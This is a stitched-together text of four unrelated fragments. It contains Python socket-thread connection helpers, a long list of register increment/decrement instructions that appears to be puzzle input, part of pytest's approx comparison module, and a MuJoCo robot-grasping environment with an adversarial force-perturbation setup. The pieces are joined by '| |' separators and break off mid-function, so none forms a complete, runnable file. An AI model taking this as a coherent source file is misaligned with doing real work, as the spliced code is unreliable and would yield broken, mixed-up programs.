    Block until the sync thread has established a connection with the server
    or the thread has expired. In case a timeout value is given, returns
    after the timeout if no connection is established before.

    Arguments:
        - timeout: seconds to wait for connection. Default is infinite timeout.

    Return:
        - boolean representing the success of the operation.
    '''
    global Sync_RX_condition
    global CLIENT_STATUS
    connected = False
    seconds_waited = 0
    if timeout is None:
        timeout = sys.maxint
    try:
        while seconds_waited < timeout:
            # Poll the shared status flag under its lock, once per second.
            Sync_RX_condition.acquire()
            connected = CLIENT_STATUS['Sync_RX_status']
            Sync_RX_condition.release()
            time.sleep(1)
            if connected:
                break
            seconds_waited += 1
    except KeyboardInterrupt:
        print_warning("keyboard interrupt received. Closing connections.")
        return False
    return connected
def Start_Async_RX():
    '''Start the Async thread. See Async_thread() function for a more detailed explanation.'''
    global Async_RX_loop
    reinit_async_socket()
    try:
        Async_RX_loop.start()
    except RuntimeError:
        # A Thread object can only be started once: build a fresh daemon
        # thread when the previous one has already run.
        fresh_thread = Thread(target=Async_thread, name="Async_RX", args=(), kwargs={})
        fresh_thread.daemon = True
        Async_RX_loop = fresh_thread
        Async_RX_loop.start()
    # print "Async RX thread launched"
def Stop_Async_RX():
    '''Stop the Async thread. See Async_thread() function for a more detailed explanation.'''
    global Async_RX_loop, Async_condition, Async_status
    # Flip the shared status flag under the lock; Async_thread polls it at
    # each loop iteration and exits once it observes False.
    Async_condition.acquire()
    print_line("Closing Async RX thread...")
    Async_status = False
    Async_condition.release()
    # Wait for the receiver thread to terminate before reporting success.
    Async_RX_loop.join()
    print_line("Async RX stopped")
def Connect(timeout=None):
'''
Connect both, the Syncronous and Asynchronous communication service.
Returns:
- True if both services are connected, False otherwise.
Arguments:
- the timeout in seconds. | |
== -1753
mmw inc -16 if t > 2911
eri dec 502 if um <= -785
hg inc 134 if x != -2775
lx dec 263 if kg <= 2978
hg dec 83 if es != -1235
mmw dec -837 if umr <= 693
dy inc 148 if um < -792
gk inc -13 if j > -247
x dec 749 if yk >= -568
lbf inc 606 if is != 2489
x inc 588 if dy >= 2345
dy dec 243 if yk <= -574
umr dec 1 if es == -1233
f dec 104 if t == 2903
aao dec 32 if es != -1224
x inc 882 if j < -245
hg inc -998 if uy == 890
dy dec -605 if dy <= 2115
hg inc 45 if gk != -1769
lbf inc -521 if t > 2894
umr inc -115 if a != 1473
lx dec -795 if x == -2194
t inc 143 if f < -1154
es dec 629 if is > 2494
lbf inc 195 if fk <= -263
fk inc 926 if aao <= -2153
um inc 351 if es != -1230
t dec -541 if lx != 316
mmw inc -329 if mmw != 4178
dy inc 708 if is > 2481
j inc 386 if t != 3050
hg dec 253 if umr == 568
um inc 236 if mmw >= 4172
fk inc -874 if hg != 1328
lbf dec -499 if um != -202
lbf dec 999 if gk > -1774
gk dec 474 if fk > -219
mmw dec -598 if yk > -585
fk inc -508 if t == 3046
mmw inc -638 if x == -2193
f dec 756 if a == 1477
mmw dec -339 if aao > -2161
um inc 109 if lbf <= -578
fk dec -421 if lx < 321
is inc -725 if ada >= -1226
fk dec -458 if ada >= -1226
uy dec -588 if aao <= -2160
ada inc 404 if dy != 3420
x inc 788 if f <= -1910
kg dec -520 if is == 1754
es dec 895 if lbf < -568
fk dec -999 if lbf == -578
kg dec -38 if lbf != -574
uy inc 343 if lbf != -579
is dec -176 if es <= -2125
lbf dec -680 if lbf < -573
eri inc 562 if uy != 1823
x inc 87 if fk >= 1158
umr dec -850 if eri > -1843
um inc -978 if eri <= -1849
x dec 389 if gk < -2241
f inc -288 if a != 1486
kg dec -484 if uy < 1826
lx dec -328 if lbf != 97
um inc -998 if gk <= -2240
yk inc 314 if mmw <= 5120
t dec -884 if es == -2128
uy dec 190 if f <= -2199
lx dec 128 if umr > 1425
eri inc 807 if a > 1485
ada inc 272 if umr < 1422
hg inc 630 if is == 1937
um dec 143 if ada >= -949
eri dec -334 if lx != 637
fk dec 147 if umr < 1426
gk dec 309 if uy == 1631
aao dec 233 if hg == 1336
is dec 825 if yk > -271
lbf dec -498 if umr <= 1413
kg dec 473 if es > -2131
mmw dec -728 if hg != 1327
dy dec 309 if hg <= 1341
dy inc -863 if kg >= 3023
x inc -465 if lx <= 647
a inc 253 if x >= -1793
kg inc -184 if eri < -1500
um inc -527 if lx != 652
j inc -455 if hg > 1328
eri inc 866 if yk != -263
aao inc -47 if gk > -2553
gk inc 228 if gk < -2554
gk inc -493 if fk <= 1006
mmw inc 800 if x == -1784
lbf inc -351 if umr < 1426
a inc -903 if ada > -958
umr inc 942 if es != -2128
dy inc 600 if a < 830
j dec -247 if lx < 646
gk dec -922 if t >= 3930
mmw inc -114 if lx != 654
fk dec 415 if um > -1764
t inc -763 if lbf < -246
ada inc 818 if is > 1108
uy inc -839 if t != 3171
fk inc -335 if is > 1106
fk dec -335 if yk == -263
fk inc -291 if dy == 3711
lx dec -665 if yk != -263
es dec -772 if uy != 792
umr dec -528 if um != -1764
t dec -95 if es < -2137
es inc -800 if yk >= -261
kg inc 150 if j >= -70
f dec -118 if mmw < 6536
a inc 595 if uy > 794
is inc 927 if lx > 636
eri dec -61 if x != -1785
hg inc -878 if yk != -260
gk inc -727 if fk <= 305
mmw dec -945 if a <= 833
aao inc -101 if x >= -1792
hg dec 567 if es > -2131
gk inc -689 if mmw < 7484
ada inc -644 if eri > -1452
yk inc -810 if yk > -265
um dec 655 if aao < -2533
t dec 179 if umr != 1943
gk inc 833 if hg >= -110
fk dec 998 if fk < 315
a dec -558 if aao > -2543
x inc 426 if lbf == -249
uy inc 892 if yk > -1075
umr inc 250 if es <= -2127
mmw inc -727 if umr >= 2193
kg dec 111 if es == -2128
dy dec 898 if fk != -693
yk dec 168 if umr >= 2191
uy dec 113 if dy <= 3711
mmw inc -752 if yk == -1241
yk inc -181 if t > 2989
mmw dec -636 if t < 2995
a inc -424 if hg == -109
j dec -762 if ada > -780
lx dec 565 if uy <= 1577
aao dec 858 if j == 697
fk inc -383 if a < 969
eri inc -51 if lx <= 85
aao inc 666 if j > 690
t dec 234 if a == 964
aao inc -69 if fk > -1085
es inc -721 if gk >= -2215
is inc -185 if lbf > -251
mmw dec 411 if es == -2849
f dec -214 if gk == -2210
yk inc 904 if aao >= -2804
es inc 883 if mmw != 6210
x dec 6 if ada != -774
aao inc -776 if um != -2419
j inc -653 if yk == -344
gk dec 338 if fk != -1072
yk inc -13 if x >= -1360
lbf inc 201 if dy < 3716
yk dec -904 if aao != -3575
f dec 922 if j == 697
uy dec -562 if lbf != -53
gk dec 50 if lbf <= -47
t inc -670 if mmw > 6222
lx inc 515 if uy == 2133
yk inc 261 if dy > 3704
x dec -854 if uy == 2133
kg inc 66 if umr == 2196
kg dec -83 if j != 706
ada inc 739 if gk > -2590
eri dec 379 if eri == -1497
dy inc 638 if aao >= -3583
a dec 130 if is > 1851
mmw dec 399 if uy == 2133
eri inc -195 if f > -2801
j dec 885 if dy > 4339
eri inc -544 if aao == -3587
kg inc 895 if t != 2984
yk inc 258 if dy <= 4350
es dec 660 if dy == 4342
umr inc -92 if gk < -2592
eri inc 361 if x == -504
um dec -298 if gk != -2588
fk dec 532 if j < -184
uy inc 31 if f < -2791
aao dec 31 if j != -182
ada inc 448 if um <= -2113
fk inc -13 if eri <= -1703
t inc -59 if es >= -1971
gk dec -909 if x == -510
es inc 805 if hg >= -112
j dec 734 if kg >= 3919
um inc 369 if aao != -3606
yk inc -548 if dy > 4348
gk inc 934 if j < -182
x dec 346 if hg <= -107
lbf dec -379 if eri != -1718
lbf inc -921 if f >= -2802
mmw inc -191 if eri <= -1703
umr inc 252 if lx != 600
mmw dec 410 if ada >= -330
gk inc 558 if a != 828
mmw dec 320 if um <= -1744
ada dec 517 if t < 2933
is dec -616 if ada > -835
yk dec -406 if j <= -185
yk inc -526 if lbf <= -586
ada inc 368 if j == -188
kg inc -89 if f <= -2791
kg dec -531 if lbf == -590
mmw | |
<reponame>albertvillanova/pytest<gh_stars>0
import math
import pprint
from collections.abc import Iterable
from collections.abc import Mapping
from collections.abc import Sized
from decimal import Decimal
from numbers import Complex
from types import TracebackType
from typing import Any
from typing import Callable
from typing import cast
from typing import Generic
from typing import Optional
from typing import overload
from typing import Pattern
from typing import Tuple
from typing import Type
from typing import TypeVar
from typing import Union
import _pytest._code
from _pytest.compat import final
from _pytest.compat import STRING_TYPES
from _pytest.outcomes import fail
def _non_numeric_type_error(value, at: Optional[str]) -> TypeError:
at_str = " at {}".format(at) if at else ""
return TypeError(
"cannot make approximate comparisons to non-numeric values: {!r} {}".format(
value, at_str
)
)
# builtin pytest.approx helper
class ApproxBase:
    """Shared machinery for making approximate comparisons between numbers
    or sequences of numbers."""

    # Tell numpy to defer to our `__eq__` operator instead of broadcasting its own.
    __array_ufunc__ = None
    __array_priority__ = 100

    def __init__(self, expected, rel=None, abs=None, nan_ok: bool = False) -> None:
        __tracebackhide__ = True
        self.expected = expected
        self.abs = abs
        self.rel = rel
        self.nan_ok = nan_ok
        self._check_type()

    def __repr__(self) -> str:
        # Subclasses know how to render their expected value; the base does not.
        raise NotImplementedError

    def __eq__(self, actual) -> bool:
        # Equal iff every yielded (actual, expected) pair matches approximately.
        for got, want in self._yield_comparisons(actual):
            if not (got == self._approx_scalar(want)):
                return False
        return True

    # Ignore type because of https://github.com/python/mypy/issues/4266.
    __hash__ = None  # type: ignore

    def __ne__(self, actual) -> bool:
        return not (actual == self)

    def _approx_scalar(self, x) -> "ApproxScalar":
        # Wrap one element with the same tolerance settings as this object.
        return ApproxScalar(x, rel=self.rel, abs=self.abs, nan_ok=self.nan_ok)

    def _yield_comparisons(self, actual):
        """Yield all the pairs of numbers to be compared.
        This is used to implement the `__eq__` method.
        """
        raise NotImplementedError

    def _check_type(self) -> None:
        """Raise a TypeError if the expected value is not a valid type."""
        # This is only a concern if the expected value is a sequence. In every
        # other case, the approx() function ensures that the expected value has
        # a numeric type. For this reason, the default is to do nothing. The
        # classes that deal with sequences should reimplement this method to
        # raise if there are any non-numeric elements in the sequence.
        pass
def _recursive_list_map(f, x):
if isinstance(x, list):
return list(_recursive_list_map(f, xi) for xi in x)
else:
return f(x)
class ApproxNumpy(ApproxBase):
    """Perform approximate comparisons where the expected value is a numpy array."""

    def __repr__(self) -> str:
        approx_leaves = _recursive_list_map(self._approx_scalar, self.expected.tolist())
        return "approx({!r})".format(approx_leaves)

    def __eq__(self, actual) -> bool:
        import numpy as np

        # ``self.expected`` is supposed to always be an array here; coerce a
        # non-scalar ``actual`` so the two can be compared element-wise.
        if not np.isscalar(actual):
            try:
                actual = np.asarray(actual)
            except Exception as e:
                raise TypeError(
                    "cannot compare '{}' to numpy.ndarray".format(actual)
                ) from e
            if actual.shape != self.expected.shape:
                return False
        return ApproxBase.__eq__(self, actual)

    def _yield_comparisons(self, actual):
        import numpy as np

        # ``actual`` is either a numpy array or a scalar; it was normalized in
        # ``__eq__`` before being handed to ``ApproxBase.__eq__``, the only caller.
        actual_is_scalar = np.isscalar(actual)
        for idx in np.ndindex(self.expected.shape):
            if actual_is_scalar:
                yield actual, self.expected[idx].item()
            else:
                yield actual[idx].item(), self.expected[idx].item()
class ApproxMapping(ApproxBase):
    """Perform approximate comparisons where the expected value is a mapping
    with numeric values (the keys can be anything)."""

    def __repr__(self) -> str:
        approx_items = {key: self._approx_scalar(val) for key, val in self.expected.items()}
        return "approx({!r})".format(approx_items)

    def __eq__(self, actual) -> bool:
        # Anything without .keys(), or with a different key set, cannot match.
        try:
            keys_match = set(actual.keys()) == set(self.expected.keys())
        except AttributeError:
            return False
        if not keys_match:
            return False
        return ApproxBase.__eq__(self, actual)

    def _yield_comparisons(self, actual):
        for key in self.expected:
            yield actual[key], self.expected[key]

    def _check_type(self) -> None:
        __tracebackhide__ = True
        for key, value in self.expected.items():
            # Nested mappings are rejected up front with a readable dump.
            if isinstance(value, type(self.expected)):
                msg = "pytest.approx() does not support nested dictionaries: key={!r} value={!r}\n full mapping={}"
                raise TypeError(msg.format(key, value, pprint.pformat(self.expected)))
class ApproxSequencelike(ApproxBase):
    """Perform approximate comparisons where the expected value is a sequence of numbers."""

    def __repr__(self) -> str:
        # Render in the original container type where it reads naturally;
        # anything exotic falls back to a list.
        container = type(self.expected)
        if container not in (tuple, list, set):
            container = list
        return "approx({!r})".format(
            container(self._approx_scalar(item) for item in self.expected)
        )

    def __eq__(self, actual) -> bool:
        # Unsized objects (TypeError from len) and length mismatches never match.
        try:
            same_length = len(actual) == len(self.expected)
        except TypeError:
            return False
        return same_length and ApproxBase.__eq__(self, actual)

    def _yield_comparisons(self, actual):
        return zip(actual, self.expected)

    def _check_type(self) -> None:
        __tracebackhide__ = True
        for index, item in enumerate(self.expected):
            # Nested sequences are rejected up front with a readable dump.
            if isinstance(item, type(self.expected)):
                msg = "pytest.approx() does not support nested data structures: {!r} at index {}\n full sequence: {}"
                raise TypeError(msg.format(item, index, pprint.pformat(self.expected)))
class ApproxScalar(ApproxBase):
    """Perform approximate comparisons where the expected value is a single number."""

    # Using Real should be better than this Union, but not possible yet:
    # https://github.com/python/typeshed/pull/3108
    DEFAULT_ABSOLUTE_TOLERANCE = 1e-12  # type: Union[float, Decimal]
    DEFAULT_RELATIVE_TOLERANCE = 1e-6  # type: Union[float, Decimal]

    def __repr__(self) -> str:
        """Return a string communicating both the expected value and the
        tolerance for the comparison being made.
        For example, ``1.0 ± 1e-6``, ``(3+4j) ± 5e-6 ∠ ±180°``.
        """
        # Don't show a tolerance for values that aren't compared using
        # tolerances, i.e. non-numerics and infinities. Need to call abs to
        # handle complex numbers, e.g. (inf + 1j).
        if (not isinstance(self.expected, (Complex, Decimal))) or math.isinf(
            abs(self.expected)
        ):
            return str(self.expected)
        # If a sensible tolerance can't be calculated, self.tolerance will
        # raise a ValueError. In this case, display '???'.
        try:
            vetted_tolerance = "{:.1e}".format(self.tolerance)
            if (
                isinstance(self.expected, Complex)
                and self.expected.imag
                and not math.isinf(self.tolerance)
            ):
                vetted_tolerance += " ∠ ±180°"
        except ValueError:
            vetted_tolerance = "???"
        return "{} ± {}".format(self.expected, vetted_tolerance)

    def __eq__(self, actual) -> bool:
        """Return whether the given value is equal to the expected value
        within the pre-specified tolerance."""
        if _is_numpy_array(actual):
            # Call ``__eq__()`` manually to prevent infinite-recursion with
            # numpy<1.13. See #3748.
            return all(self.__eq__(a) for a in actual.flat)
        # Short-circuit exact equality.
        if actual == self.expected:
            return True
        # If either type is non-numeric, fall back to strict equality.
        # NB: we need Complex, rather than just Number, to ensure that __abs__,
        # __sub__, and __float__ are defined.
        if not (
            isinstance(self.expected, (Complex, Decimal))
            and isinstance(actual, (Complex, Decimal))
        ):
            return False
        # Allow the user to control whether NaNs are considered equal to each
        # other or not. The abs() calls are for compatibility with complex
        # numbers.
        if math.isnan(abs(self.expected)):
            return self.nan_ok and math.isnan(abs(actual))
        # Infinity shouldn't be approximately equal to anything but itself, but
        # if there's a relative tolerance, it will be infinite and infinity
        # will seem approximately equal to everything. The equal-to-itself
        # case would have been short circuited above, so here we can just
        # return false if the expected value is infinite. The abs() call is
        # for compatibility with complex numbers.
        if math.isinf(abs(self.expected)):
            return False
        # Return true if the two numbers are within the tolerance.
        result = abs(self.expected - actual) <= self.tolerance  # type: bool
        return result

    # Ignore type because of https://github.com/python/mypy/issues/4266.
    __hash__ = None  # type: ignore

    @property
    def tolerance(self):
        """Return the tolerance for the comparison.
        This could be either an absolute tolerance or a relative tolerance,
        depending on what the user specified or which would be larger.

        Raises ValueError when either tolerance is negative or NaN.
        """

        def set_default(x, default):
            return x if x is not None else default

        # Figure out what the absolute tolerance should be. ``self.abs`` is
        # either None or a value specified by the user.
        absolute_tolerance = set_default(self.abs, self.DEFAULT_ABSOLUTE_TOLERANCE)
        if absolute_tolerance < 0:
            raise ValueError(
                "absolute tolerance can't be negative: {}".format(absolute_tolerance)
            )
        if math.isnan(absolute_tolerance):
            raise ValueError("absolute tolerance can't be NaN.")
        # If the user specified an absolute tolerance but not a relative one,
        # just return the absolute tolerance.
        if self.rel is None:
            if self.abs is not None:
                return absolute_tolerance
        # Figure out what the relative tolerance should be. ``self.rel`` is
        # either None or a value specified by the user. This is done after
        # we've made sure the user didn't ask for an absolute tolerance only,
        # because we don't want to raise errors about the relative tolerance if
        # we aren't even going to use it.
        relative_tolerance = set_default(
            self.rel, self.DEFAULT_RELATIVE_TOLERANCE
        ) * abs(self.expected)
        if relative_tolerance < 0:
            # Bug fix: this message previously interpolated
            # ``absolute_tolerance``, reporting the wrong value.
            raise ValueError(
                "relative tolerance can't be negative: {}".format(relative_tolerance)
            )
        if math.isnan(relative_tolerance):
            raise ValueError("relative tolerance can't be NaN.")
        # Return the larger of the relative and absolute tolerances.
        return max(relative_tolerance, absolute_tolerance)
class ApproxDecimal(ApproxScalar):
    """Perform approximate comparisons where the expected value is a Decimal."""
    # Override the float defaults with Decimal values so the tolerance
    # arithmetic stays in Decimal instead of mixing with binary floats.
    DEFAULT_ABSOLUTE_TOLERANCE = Decimal("1e-12")
    DEFAULT_RELATIVE_TOLERANCE = Decimal("1e-6")
def approx(expected, rel=None, abs=None, nan_ok: bool = | |
from collections import OrderedDict
from mujoco_py import MjSim, MjViewer
from mujoco_py import load_model_from_xml, load_model_from_path
import mujoco_py.cymj as cymj
from mujoco_py.generated import const
from mujoco_py import functions
from grasp.utils import MujocoPyRenderer
from grasp.controllers import inverse_kinematics
from grasp.utils.mjcf_utils import xml_path_completion
from grasp.utils.mjcf_utils import image_path_completion
from grasp.utils.mjcf_utils import log_path_completion
from grasp.utils.mjcf_utils import human_path_completion
from grasp.utils.mjcf_utils import model_path_completion
from grasp.utils.mjcf_utils import loss_path_completion
from grasp.utils.mjcf_utils import config_path_completion
from grasp.utils.mjcf_utils import preprocess
from grasp.utils.mjcf_utils import rotateImageAndExtractPatch
from grasp.predict_module import predict_from_img
from grasp.predict_module.predict_API import predict_from_R_table
from grasp.predict_module import init_detector
from grasp.predict_module.predict_API import init_detector_test
from grasp.predict_module.predict_API import init_detector_test_use_filter
from grasp.predict_module.predict_API import init_detector_with_filter
from grasp.predict_module.predict_API import drawRectangle_spot_on_centre
from grasp.predict_module import build_network
from grasp.predict_module import train_adv
from grasp.predict_module import prepare_X_batch
from grasp.predict_module import prepare_X_batch2
# debug
from grasp.predict_module import adv_predict_from_img
from grasp.predict_module import init_adv
from grasp.predict_module.predict_API import init_force_filter2
import os
import time
import math
import numpy as np
import imageio
import imutils
from termcolor import colored
import random
from time import gmtime, strftime
import xml.etree.ElementTree as ET
import glfw
import shutil
import gc
import copy
from time import sleep
import ipdb
import ast
# Global name -> class registry consumed by ``make``.
REGISTERED_ENVS = {}


def register_env(target_class):
    """Record ``target_class`` in the global registry under its class name."""
    REGISTERED_ENVS.update({target_class.__name__: target_class})


# Instantiation flow: will call __init__ -> base.reset_internal() -> load_model
def make(env_name, *args, **kwargs):
    """Look up ``env_name`` in the registry and return a new instance of it,
    forwarding ``*args``/``**kwargs`` to its constructor."""
    env_cls = REGISTERED_ENVS.get(env_name)
    if env_cls is None:
        raise Exception(
            "Environment {} not found. Make sure it is a registered environment among: {}".format(
                env_name, ", ".join(REGISTERED_ENVS)
            )
        )
    print('Registered_ENV: {}'.format(REGISTERED_ENVS))
    return env_cls(*args, **kwargs)
class EnvMeta(type):
    """Metaclass that auto-registers every environment class it creates,
    except the abstract bases that should never be instantiated directly."""

    def __new__(meta, name, base, class_dict):
        new_cls = super().__new__(meta, name, base, class_dict)
        skip = ('MujocoEnv', 'SawyerEnv')
        if new_cls.__name__ not in skip:
            register_env(new_cls)
        return new_cls
class MujocoEnv(metaclass = EnvMeta):
def __init__(
self,
has_renderer=True,
has_offscreen_renderer=False,
render_collision_mesh=True,
render_visual_mesh=True,
control_freq=10,
horizon=1000,
ignore_done=False,
use_camera_obs=False,
camera_name="frontview",
camera_height=256,
camera_width=256,
camera_depth=False,
use_render = True,
log_name = '1',
use_new_model = 'False',
use_pro_new='False',
to_train ='False',
is_human ='False',
train_pro='False',
adv_init=False,
random_perturb=False,
use_pro_name='',
use_new_name='',
object_xml='',
user_name='',
seed =48,
params =None,
test_user = False,
is_test=False,
use_filter=False,
option=0
):
self.has_renderer = True
self.has_offscreen_renderer = has_offscreen_renderer
self.render_collision_mesh = render_collision_mesh
self.render_visual_mesh = render_visual_mesh
self.control_freq = control_freq
self.horizon = horizon
self.ignore_done = ignore_done
self.viewer = None
self.model = None
self.use_new_name=use_new_name
self.use_pro_name = use_pro_name
self.user_name = user_name
self.params = params
self.begin_time = strftime("%Y-%m-%d %H:%M:%S", gmtime())
#random init of object size, location and orientation
if object_xml =='all.xml':
self.random_init= True
else:
self.random_init = False
self.object_xml = object_xml
print('model used: {}'.format(self.object_xml))
# settings for camera observations
self.use_camera_obs = use_camera_obs
if self.use_camera_obs and not self.has_offscreen_renderer:
raise ValueError("Camera observations require an offscreen renderer.")
self.camera_name = camera_name
if self.use_camera_obs and self.camera_name is None:
raise ValueError("Must specify camera name when using camera obs")
self.camera_height = camera_height
self.camera_width = camera_width
self.camera_depth = camera_depth
# required by stable_baselines monitor
self.metadata = {'render.modes': []}
self.reward_range = (-float('inf'), float('inf'))
self.spec = None
self.speed = 1.
self.pert = 1
self._reset_internal()
#initialize detector only once
self.num_samples = 128
self.num_samples_spot = 17#17
self.batch_update = 2
self.train_batch_update= 4 #7
self.record_state_force_filter = []
print(colored('initialize protagonist detection model', 'red'))
self.lr_rate = 0.0001 #0.001
#self.random_init = True ### test script
self.adv_start_idx = 100
self.is_valid_sample = True
self.use_force_filter = use_filter#False
self.is_test = is_test#False
self.contained_curriculum = None
self.contained_curriculum_test = None
self.option = option
self.empty_num = 0
self.lift_success = False
self.failed_cases_stack1 = []
self.failed_cases_stack2 = []
self.max_steps = 0
self.R_table_update_info = None
self.is_force_classify_test = False
self.num_help_samples = 0
self.num_adv_samples = 0
self.default_filtering = True
self.patch_Is_resized_vec2=[]
self.y_train_vec2=[]
self.fc8_predictions_vec2=[]
self.pro_save_num2 = 1
if not self.random_init:
if self.object_xml =='half-nut.xml' :
self.lr_rate = 0.0001#0.00001
if self.object_xml=='round-nut.xml':
self.lr = 0.005
self.G = None
self.G_filter = None
self.G_force = None
if not is_test:
if use_filter:
self.G = init_detector_with_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user)
self.G_filter = init_detector(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user)
else:
self.G = init_detector(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user)
self.G_filter = init_detector_with_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user)
elif use_filter:
self.G = init_detector_test_use_filter(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user, option=self.option)
elif not use_filter:
self.G = init_detector_test(self.num_samples, use_pro_new, use_pro_name, self.num_samples,
gpu_id=0, lr_rate=self.lr_rate, test_user=test_user, option=self.option)
self.is_once_created_R_table = False
self.is_once_created_R_table2 = False
self.is_once_created_filter = False
self.center_pt = None
self.R_table = None
self.R_table2 = None
#self.F_table = None
self.crop_h_ = None
self.crop_w_ = None
self.min_coord = None
self.range_ = None
self.training_R_table_ground_truth = False
self.count_to_100 = 0
self.current_coord_offset_X = 0#200#60#270
self.current_coord_offset_Y = 0
self.post_reward_list = []
self.stop_training = False
self.post_reward = 1
self.force_type = None
self.save_R_table_purterbed = False
self.save_R_table_Up = False
self.thold_start_using_filter = 25 # 25
self.force_type_inst = False
# the first means no force is applied
# object to use
force = 3.5
if not self.random_init:
force = 3.5
if self.object_xml=='bottle.xml':
force= 3.5
if self.object_xml=='bread.xml':
force=3
if self.object_xml=='new_cube.xml':
force=3.0
if self.object_xml=='round-nut.xml':
force=6 #later changed to 4
if self.object_xml =='half-nut.xml':
force = 5.5
if self.object_xml =='cube.xml':
force = 1.5
down_force = 0.3
if not self.random_init:
down_force = 1
if self.object_xml == 'cube.xml':
down_force = 0.3
if self.object_xml == 'new_cube.xml':
down_force = 0.5
if self.object_xml =='half-nut.xml':
down_force= 0.3
print(colored('obejct_xml: {}, force: {}, down_force: {}'.format(self.object_xml, force, down_force),'red'))
self.is_human = is_human
if self.is_human:
self.adv_forces = np.array([[0, 0, 0, 0, 0, 0],[-force, 0, 0, 0, 0, 0], [0, -force, 0, 0, 0, 0], [force ,0, 0, 0, 0, 0], [0, force, 0, 0, 0, 0], [0, 0, force, 0, 0, 0], [0, 0, -down_force, 0, 0, 0]])
self.idx_to_action = {0: 'nothing', 1: 'left', 2: 'outward', 3: 'right', 4: 'inside', 5: 'up', 6:'down'}
else:
self.adv_forces = np.array([[-force, 0, 0, 0, 0, 0] , [0 , 0, -down_force, 0, 0, 0], [0, -force, 0, 0, 0, 0], [force ,0, 0, 0, 0, 0], [0, force, 0, 0, 0, 0], [0, 0, force, 0, 0, 0]])
# self.adv_forces = np.array([[0, -force, 0, 0, 0, 0]])
self.idx_to_action = {0:'left', 1: 'down', 2:'outward', 3:'right', 4:'inside', 5:'up'}
# self.idx_to_action = {0:'outward'}
self.n_adv_outputs = len(self.adv_forces)
self.log_name = log_name
# init adv policy, get sess
self.adv_init=adv_init
self.G_adv = None
if not self.is_human and self.adv_init:
print(colored('initialize adversarial detection model', 'blue'))
# self.adv_policy = build_network(outputs=self.n_adv_outputs, use_new_model=use_new_model, use_new_name=self.use_new_name, log_name=self.log_name, gpu_id=3)
self.G_adv = init_adv(self.num_samples, use_new_model, use_new_name, self.num_samples, gpu_id=0, adv_lr_rate =0.001)
#self.G_force = init_force_filter(batch_size=1, gpu_id=0, lr_rate=0.01, Collective_dimension=2323)
self.fc8_norms = None
self.fc8_norms2 = None
# collect adv inputs
self.rot_images=[]
self.rot_y_batches=[]
self.train_nums =1
self.pro_train_nums=1
self.pro_train_nums_filter=1
self.save_num =1
self.pro_save_num =1
# record reward, adv_error
self.adv_error_logs=[]
self.reward_logs=[]
self.total_steps = 0
self.use_render = use_render
self.use_new_model = use_new_model
self.to_train = to_train
self.intention = 0#-1 #initial intention == help
self.error_log_path = log_path_completion('error_log{}.txt'.format(self.log_name))
self.reward_log_path = log_path_completion('reward_log{}.txt'.format(self.log_name))
self.adv_loss_log_path = loss_path_completion('adv_loss_log{}.txt'.format(self.log_name))
self.pro_loss_log_path = loss_path_completion('pro_loss_log{}.txt'.format(self.log_name))
self.pro_loss_log_path2 = loss_path_completion('pro_loss_log_filter{}.txt'.format(self.log_name))
self.config_log_path = config_path_completion('config_log{}.txt'.format(self.log_name))
# if file already exists, delete first
if os.path.exists(self.error_log_path):
os.remove(self.error_log_path)
if os.path.exists(self.reward_log_path):
os.remove(self.reward_log_path)
if os.path.exists(self.adv_loss_log_path):
os.remove(self.adv_loss_log_path)
if os.path.exists(self.pro_loss_log_path):
os.remove(self.pro_loss_log_path)
if os.path.exists(self.config_log_path):
os.remove(self.config_log_path)
self.human_error_log_path = human_path_completion('human_error_log{}.txt'.format(self.log_name))
self.human_reward_log_path = human_path_completion('human_reward_log{}.txt'.format(self.log_name))
if os.path.exists(self.human_error_log_path):
os.remove(self.human_error_log_path)
if os.path.exists(self.human_reward_log_path):
os.remove(self.human_reward_log_path)
# delete predict image directory is already exists
if os.path.exists(image_path_completion(self.log_name)):
shutil.rmtree(image_path_completion(self.log_name))
# train protagonist policy
self.train_pro = train_pro
self.patch_Is_resized_vec=[]
self.y_train_vec=[]
self.fc8_predictions_vec=[]
# inference
self.infer_adv = False
self.random_perturb= random_perturb
#log
self.write_log_num =1
self.write_log_update = 5
# alpha
self.alpha = 0.20
if not self.random_init:
self.alpha= 0.20
if self.object_xml == 'cube.xml':
self.alpha = 0.25
elif self.object_xml =='bottle.xml':
self.alpha = 0.20
elif self.object_xml == 'half-nut.xml':
self.alpha = 0.5
self.early_stop_num = 45
self.seed = seed
#fix random perturb seed
np.random.seed(int(time.time() + np.random.randint(10, 50)))
# write log info
print(colored('print logging info ', 'red'))
with open(self.config_log_path, 'w') as fw:
fw.write('User name: ' + self.user_name + '\n')
fw.write('Begin time: ' + self.begin_time + '\n\n\n')
fw.write('Config params: '+ '\n')
for key, val in self.params.items():
fw.write(str(key) + ': ' + str(val) + '\n')
fw.write('\n\n\n')
fw.write('Other params: ' + '\n')
fw.write('alpha: ' + str(self.alpha) + '\n')
fw.write('early stop num : ' + str(self.early_stop_num) + '\n')
fw.write('num samples: ' + str(self.num_samples)+ '\n')
fw.write('adv batch update: ' + str(self.batch_update)+ '\n')
fw.write('pro batch update: ' + str(self.train_batch_update)+ '\n')
fw.write('write log update: ' + str(self.write_log_update)+ '\n')
fw.write('random init: ' + str(self.random_init)+ '\n')
fw.write('seed: ' + str(self.seed)+ '\n')
fw.write('\n\n\n')
fw.write('Force config: ' + '\n')
for item in self.adv_forces:
fw.write(" ".join(map(str, item)))
fw.write('\n')
fw.write('\n')
for key,val in self.idx_to_action.items():
fw.write(str(key) + ':' + val)
fw.write('\n')
fw.write('\n')
if self.is_human:
with open(self.config_log_path, 'w') as fw:
fw.write('User name: ' + self.user_name + '\n')
fw.write('Begin time: ' + self.begin_time + '\n\n\n')
fw.write('Config params: ' + '\n')
for key, val in self.params.items():
fw.write(str(key) + ': ' + str(val) + '\n')
fw.write('\n\n\n')
fw.write('Other params: ' + '\n')
fw.write('alpha: ' + str(self.alpha)+ '\n')
fw.write('early stop num : ' + str(self.early_stop_num)+ '\n')
fw.write('num samples: ' + str(self.num_samples)+ '\n')
fw.write('adv batch update: ' + str(self.batch_update)+ '\n')
fw.write('pro batch update: ' + str(self.train_batch_update)+ '\n')
